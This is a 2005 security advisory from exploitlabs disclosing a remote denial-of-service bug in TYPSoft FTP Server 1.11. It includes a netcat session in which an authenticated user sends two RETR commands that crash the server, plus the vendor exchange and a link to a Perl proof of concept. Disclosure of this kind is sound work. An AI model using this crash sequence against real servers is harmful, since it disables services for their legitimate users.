------------------------------------------------------------ - EXPL-A-2005-016 exploitlabs.com Advisory 045 - ------------------------------------------------------------ - typsoft ftpd - AFFECTED PRODUCTS ================= TYPSoft FTP Server v1.11 and earlier http://www.typsoft.com/ OVERVIEW ======== TYPSoft FTP Server is a fast and easy ftp server with support to Standard FTP Command, Clean interface, Virtual File System architecture, ability to resume Download and Upload, IP Restriction, Login/Quit message, logs, Multi Language and many other things. DETAILS ======= 1. DOS Typsoft ftp server does not properly support the RETR command. When "Sub Directory Include" is checked in the user config. This is exploitable by authenticated users to TYPSoft ftpd. POC === 1. by requesting 2 RETR [string] commands in succession C:\>nc -v 192.168.0.2 21 ftpserv [192.168.0.2] 21 (ftp) open 220 TYPSoft FTP Server 1.11 ready... USER ok 331 Password required for ok. PASS ok 230 User ok logged in. RETR 0 150 Opening data connection for 0. RETR 0 150 Opening data connection for 0. [ crash here ] C:\> Exception ESocketException in module ftpserv.exe at 000862A6 "no port specified" note: string length has no effect and does not appear exploitable. SOLUTION: ========= vendor contact: Oct 10, 2005 webmaster@typsoft.com response: --------- Well i dont see any security problem except that TFS will raise an error because the socket was not open on the second RETR It's more a bug that a security problem except if you show me the opposite. Marc TYPSoft reply: ------ see attatched perl POC it demonstrates a full crash ( program exit ) from remote. note: a remote DOS is classified as a security issue, even if it does not lead to compromise, due to the fact that a remote user ( not administrative ) can disable a (needed) service. http://www.exploitlabs.com/files/advisories/typsoft-poc.zip response: --------- [none] CREDITS ======= This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: wood at exploitlabs.com mail: morning_wood at zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org http://www.exploitlabs.com/files/advisories/EXPL-A-2005-16-typsoft-ftpd.txt